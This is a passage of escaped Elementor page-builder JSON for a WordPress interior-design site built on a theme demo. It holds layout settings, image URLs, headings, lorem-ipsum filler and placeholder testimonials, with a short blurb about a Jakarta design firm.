\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/minh-pham-OtXADkUh3-I-unsplash.jpg\",\"id\":3001,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"LOREM IPSUM\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">LOREM IPSUM<\\/span><\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. <\\/span><\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\nOur highlighted services\\nfor interior design\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why choose ?\",\"description\":\"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-why-choose.jpg\",\"id\":2090,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept 